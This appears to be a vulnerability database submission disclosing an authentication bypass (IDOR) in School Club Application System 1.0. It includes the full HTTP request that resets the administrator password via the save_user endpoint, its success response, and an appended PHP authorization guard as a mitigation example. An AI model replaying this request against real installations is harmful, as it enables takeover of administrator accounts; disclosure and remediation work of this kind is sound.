Submission #34399: School Club Application System (SCAS) 1.0 - Authentication Bypass
Info

Title: School Club Application System (SCAS) 1.0 - Authentication Bypass
Description:

# Exploit Title: School Club Application System (SCAS) 1.0 - Authentication Bypass
# Date: 2022-04-09
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Linux

Title:
================
School Club Application System (SCAS) 1.0 - Authentication Bypass

Summary:
================
School Club Application System (SCAS) version 1.0 is vulnerable to authentication bypass: the administrator password can be changed through an insecure direct object reference (IDOR) attack. For this reason, an attacker can gain full access to the administrator account by resetting its password.

Severity Level:
================
6.5 (Medium)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Affected Product:
================
School Club Application System v1.0

Steps to Reproduce:
================

Request:

POST /scas/classes/Users.php?f=save_user HTTP/1.1
Host: target.com
Content-Length: 785
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOJM0GBfl6KS1ELuA
Origin: http://target.com
Referer: http://target.com/scas/admin/?page=manage_account
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryOJM0GBfl6KS1ELuA
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundaryOJM0GBfl6KS1ELuA
Content-Disposition: form-data; name="firstname"

Administrator
------WebKitFormBoundaryOJM0GBfl6KS1ELuA
Content-Disposition: form-data; name="middlename"


------WebKitFormBoundaryOJM0GBfl6KS1ELuA
Content-Disposition: form-data; name="lastname"

Admin
------WebKitFormBoundaryOJM0GBfl6KS1ELuA
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryOJM0GBfl6KS1ELuA
Content-Disposition: form-data; name="password"

H4ck3d@
------WebKitFormBoundaryOJM0GBfl6KS1ELuA
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryOJM0GBfl6KS1ELuA--

Response:

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2022 15:16:38 GMT
Server: Apache/2.4.52
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}
Source: ⚠️ https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html
User: mrempy (UID 24379)
Submitted: 2022-04-09 05:32 PM (4 years ago)
Moderation: 2022-04-09 08:16 PM (3 hours later)
Status: Accepted
VulDB Entry: 196750 [School Club Application System 1.0 Users.php?f=save_user privilege escalation]
Points: 20
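
The report shows a `save_user` request that rewrites the account with `id` 1 and, as captured, carries no Cookie header. The PHP sketch below is an added example, not SCAS source code and not part of the submission: a hypothetical guard (the function name `authorize_save_user` and the session keys `user_id` and `is_admin` are assumptions) that ties the client-supplied `id` to the authenticated session before any update runs.

```php
<?php
// Added example: hypothetical guard, not SCAS source code.
// Assumed session keys: 'user_id' (int) and 'is_admin' (bool).

/**
 * Decide whether the session may apply a save_user request.
 * Returns [bool $allowed, string $reason].
 */
function authorize_save_user(array $session, array $post): array
{
    // 1. Reject requests that carry no authenticated session at all.
    if (empty($session['user_id'])) {
        return [false, 'not authenticated'];
    }

    // 2. "id" is client-controlled: accept only a positive integer.
    $target = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($target === false) {
        return [false, 'invalid id'];
    }

    // 3. Bind the target record to the session: only an administrator
    //    may edit an account other than their own.
    $isAdmin = !empty($session['is_admin']);
    if (!$isAdmin && $target !== (int) $session['user_id']) {
        return [false, 'not owner of target account'];
    }

    return [true, 'ok'];
}

// Constructed inputs: the form fields from the report, reduced to an array.
$reported = ['id' => '1', 'username' => 'admin', 'password' => 'H4ck3d@'];

$cases = [
    'no session'                  => [[], $reported],
    'user 7 targeting id 1'       => [['user_id' => 7, 'is_admin' => false], $reported],
    'admin 1 editing own account' => [['user_id' => 1, 'is_admin' => true], $reported],
    'malformed id'                => [['user_id' => 7, 'is_admin' => false], ['id' => '1abc']],
];

foreach ($cases as $label => [$session, $post]) {
    [$ok, $why] = authorize_save_user($session, $post);
    printf("%-30s %s (%s)\n", $label, $ok ? 'ALLOW' : 'DENY', $why);
}
```

A handler using such a guard would call it before touching the database and answer with HTTP 401 or 403 when it denies, rather than returning `{"status":"success"}`.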
